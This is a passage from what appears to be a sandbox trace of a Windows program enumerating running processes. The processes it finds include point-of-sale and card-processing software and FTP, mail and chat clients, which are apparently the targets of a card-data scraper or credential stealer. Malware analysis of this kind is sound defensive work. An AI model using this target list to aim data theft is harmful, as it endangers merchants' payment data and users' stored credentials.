hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0211.867] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0211.874] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0211.876] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0211.879] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0211.881] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0211.883] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0211.998] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.001] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.003] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.005] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0212.008] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0212.010] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0212.012] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0212.014] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0212.017] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.019] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.021] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.023] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0212.025] CloseHandle (hObject=0xde8) returned 1 [0212.025] Sleep (dwMilliseconds=0x64) [0212.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0212.161] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.163] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.165] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.166] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.168] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.170] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.171] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.172] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.174] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.176] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.177] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.179] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.180] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.182] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.183] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.185] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.186] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.188] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.193] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.194] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.195] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.197] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.198] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.200] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.201] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.202] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.204] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.205] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.207] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.209] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.210] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.211] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.213] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.214] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0212.216] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0212.217] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0212.219] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0212.220] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0212.222] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0212.223] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0212.225] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0212.226] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0212.227] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0212.229] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0212.284] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0212.285] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0212.287] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0212.289] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0212.290] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0212.292] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0212.293] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.295] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.296] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.298] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.299] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.302] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.303] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.305] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.307] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.308] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.310] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.312] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.314] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.315] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0212.318] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 